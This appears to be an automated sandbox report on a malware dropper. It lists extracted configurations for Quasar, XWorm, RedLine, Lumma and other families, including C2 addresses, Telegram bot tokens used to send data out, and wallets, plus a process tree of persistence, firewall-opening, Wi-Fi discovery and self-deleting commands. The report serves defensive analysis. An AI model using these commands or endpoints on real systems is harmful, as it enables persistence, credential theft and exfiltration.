Resubmissions

12-12-2024 18:20

241212-wy4dxsvkcp 10

12-12-2024 18:03

241212-wnfvwatqgp 10

28-11-2024 00:38

241128-ay5fbstmfp 10

Analysis

  • max time kernel
    130s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 18:20

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

14.243.221.170:2654

Mutex

a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd

Attributes
  • encryption_key

    8B9AD736E943A06EAF1321AD479071E83805704C

  • install_name

    Runtime Broker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Runtime Broker

  • subdirectory

    SubDir

Extracted

Family

xworm

C2

193.233.255.106:69

Attributes
  • Install_directory

    %AppData%

  • install_file

    System.exe

  • telegram

    https://api.telegram.org/bot7678901257:AAENkDGBF25IbXLdzfMeaD-OMDGJWC2_KRQ/sendMessage?chat_id=7813784541

Extracted

Family

phorphiex

C2

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes
  • mutex

    753f85d83d

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

phorphiex

C2

http://185.215.113.84

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

C2

192.168.31.99:4782

2001:4bc9:1f98:a4e::676:4782

255.255.255.0:4782

fe80::cabf:4cff:fe84:9572%17:4782

Mutex

1f65a787-81b8-4955-95e4-b7751e10cd50

Attributes
  • encryption_key

    A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9

  • install_name

    Neverlose Loader.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Java Updater

  • subdirectory

    SubDir

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403

http://209.38.221.184:8080

http://46.235.26.83:8080

http://147.28.185.29:80

http://206.166.251.4:8080

http://51.159.4.50:8080

http://167.235.70.96:8080

http://194.164.198.113:8080

http://132.145.17.167:9090

https://5.196.181.135:443

http://116.202.101.219:8080

https://185.217.98.121:443

http://185.217.98.121:8080

http://159.203.174.113:8090

http://107.161.20.142:8080

https://192.99.196.191:443

http://65.49.205.24:8080

https://154.9.207.142:443

http://67.230.176.97:8080

http://8.222.143.111:8080

Extracted

Family

vidar

Version

11.3

Botnet

a21440e9f7223be06be5f5e2f94969c7

C2

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

redline

Botnet

newbundle2

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

14082024

C2

185.215.113.67:21405

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://tacitglibbr.biz/api

Extracted

Family

xworm

Version

5.0

C2

38.180.203.11:1010

Mutex

LE5ccvPhTtoUBuJ2

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

RuntimeBroker

C2

Cmaster-57540.portmap.io:57540:8080

Mutex

7d0b5d0f-c185-4da8-b709-726d2f58400c

Attributes
  • encryption_key

    6275D618DF6119CEEF062AB381785B6186B8C0EB

  • install_name

    RuntimeBroker.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    RuntimeBroker

  • subdirectory

    devtun

Extracted

Family

quasar

Version

1.4.0

Botnet

svhost

C2

151.177.61.79:4782

Mutex

a148a6d8-1253-4e62-bc5f-c0242dd62e69

Attributes
  • encryption_key

    5BEC1A8BC6F8F695D1337C51454E0B7F3A4FE968

  • install_name

    svhost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svhost

  • subdirectory

    svhost

Extracted

Family

xworm

Version

3.1

C2

camp.zapto.org:7771

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

amadey

Version

5.04

Botnet

4bee07

C2

http://185.215.113.209

Attributes
  • install_dir

    fc9e0aaab7

  • install_file

    defnur.exe

  • strings_key

    191655f008adc880f91bfc85bc56db54

  • url_paths

    /Fru7Nk9/index.php

rc4.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

0.tcp.eu.ngrok.io:15174

Mutex

aNoM7pvDUvoo

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7673498966:AAE8RwQQVWIce7zc1tvOHxg7_EravC7Vqis/sendDocument?chat_id=621271611

https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessag

https://api.telegram.org/bot7678901257:AAENkDGBF25IbXLdzfMeaD-OMDGJWC2_KRQ/sendMessage?chat_id=7813784541

https://api.telegram.org/bot7617703274:AAFEXxgPRP1fZGT5UCjcRV4hUZdtNFxyusQ/sendMessage?chat_id=-4568449403

Extracted

Family

lumma

C2

https://tacitglibbr.biz/api

https://immureprech.biz/api

https://deafeninggeh.biz/api

https://wrathful-jammy.cyou/api

https://awake-weaves.cyou/api

https://sordid-snaked.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 3 IoCs
  • Detect Xworm Payload 5 IoCs
  • Detects Go variant of Hive Ransomware 1 IoCs
  • Gh0st RAT payload 1 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Hive family
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

  • Meduza Stealer payload 2 IoCs
  • Meduza family
  • Phorphiex family
  • Phorphiex payload 1 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 8 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 4 IoCs
  • Redline family
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 17 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 10 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 12 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2988
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2128
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:3420
        • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
          "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
          2⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2456
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1664
            • C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
              "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4852
              • C:\Windows\SYSTEM32\schtasks.exe
                "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3744
          • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
            3⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            PID:2236
          • C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe
            "C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Windows\System32\certutil.exe
              "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp"
              4⤵
                PID:3020
            • C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4940
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe" "Server1.exe" ENABLE
                4⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:2884
            • C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2724
            • C:\Users\Admin\AppData\Local\Temp\Files\test14.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\test14.exe"
              3⤵
              • Executes dropped EXE
              PID:4560
            • C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
              3⤵
              • Checks computer location settings
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2180
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:5188
            • C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
              "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3648
              • C:\Users\Admin\AppData\Local\Temp\2910514938.exe
                C:\Users\Admin\AppData\Local\Temp\2910514938.exe
                4⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5236
                • C:\Windows\sysnldcvmr.exe
                  C:\Windows\sysnldcvmr.exe
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:6056
                  • C:\Users\Admin\AppData\Local\Temp\1989129625.exe
                    C:\Users\Admin\AppData\Local\Temp\1989129625.exe
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:5272
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:5468
                      • C:\Windows\system32\reg.exe
                        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                        8⤵
                          PID:2292
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:5812
                        • C:\Windows\system32\schtasks.exe
                          schtasks /delete /f /tn "Windows Upgrade Manager"
                          8⤵
                            PID:2028
                      • C:\Users\Admin\AppData\Local\Temp\2309417675.exe
                        C:\Users\Admin\AppData\Local\Temp\2309417675.exe
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:5620
                        • C:\Users\Admin\AppData\Local\Temp\3161510603.exe
                          C:\Users\Admin\AppData\Local\Temp\3161510603.exe
                          7⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5596
                      • C:\Users\Admin\AppData\Local\Temp\262965725.exe
                        C:\Users\Admin\AppData\Local\Temp\262965725.exe
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1012
                      • C:\Users\Admin\AppData\Local\Temp\281730318.exe
                        C:\Users\Admin\AppData\Local\Temp\281730318.exe
                        6⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:5536
                • C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2532
                • C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1888
                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:5684
                • C:\Users\Admin\AppData\Local\Temp\Files\build555.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:5236
                • C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:5788
                • C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:5308
                  • C:\Users\Admin\AppData\Local\snails\ectosphere.exe
                    "C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"
                    4⤵
                    • Drops startup file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:5216
                    • C:\Users\Admin\AppData\Local\snails\ectosphere.exe
                      "C:\Users\Admin\AppData\Local\snails\ectosphere.exe"
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:5712
                • C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4228
                • C:\Users\Admin\AppData\Local\Temp\Files\steel.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3488
                  • C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp" /SL5="$7021A,3924197,54272,C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    PID:4960
                    • C:\Windows\SysWOW64\schtasks.exe
                      "C:\Windows\system32\schtasks.exe" /Delete /F /TN "video_minimizer_12125"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4536
                    • C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe
                      "C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe" -i
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:4480
                • C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe
                  "C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Accesses Microsoft Outlook profiles
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • outlook_office_path
                  • outlook_win_path
                  PID:2920
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                    4⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:4408
                    • C:\Windows\system32\chcp.com
                      chcp 65001
                      5⤵
                        PID:5764
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profiles
                        5⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:1472
                      • C:\Windows\system32\findstr.exe
                        findstr /R /C:"[ ]:[ ]"
                        5⤵
                          PID:1092
                      • C:\Windows\SYSTEM32\cmd.exe
                        "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                        4⤵
                          PID:5744
                          • C:\Windows\system32\chcp.com
                            chcp 65001
                            5⤵
                              PID:5124
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show networks mode=bssid
                              5⤵
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:1632
                            • C:\Windows\system32\findstr.exe
                              findstr "SSID BSSID Signal"
                              5⤵
                                PID:6100
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"
                              4⤵
                                PID:1116
                                • C:\Windows\system32\chcp.com
                                  chcp 65001
                                  5⤵
                                    PID:5412
                                  • C:\Windows\system32\timeout.exe
                                    timeout /t 3
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:1684
                              • C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:4056
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5856
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & rd /s /q "C:\ProgramData\JKEGDHCFCAAE" & exit
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5636
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 10
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      • Delays execution with timeout.exe
                                      PID:5592
                              • C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4664
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\BKKFCFBKFCFB" & exit
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4924
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 10
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    • Delays execution with timeout.exe
                                    PID:5748
                              • C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Modifies system certificate store
                                PID:4592
                              • C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3364
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2944
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                                  "Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'
                                  4⤵
                                  • Drops startup file
                                  • System Location Discovery: System Language Discovery
                                  PID:5768
                              • C:\Users\Admin\AppData\Local\Temp\Files\test26.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\test26.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4492
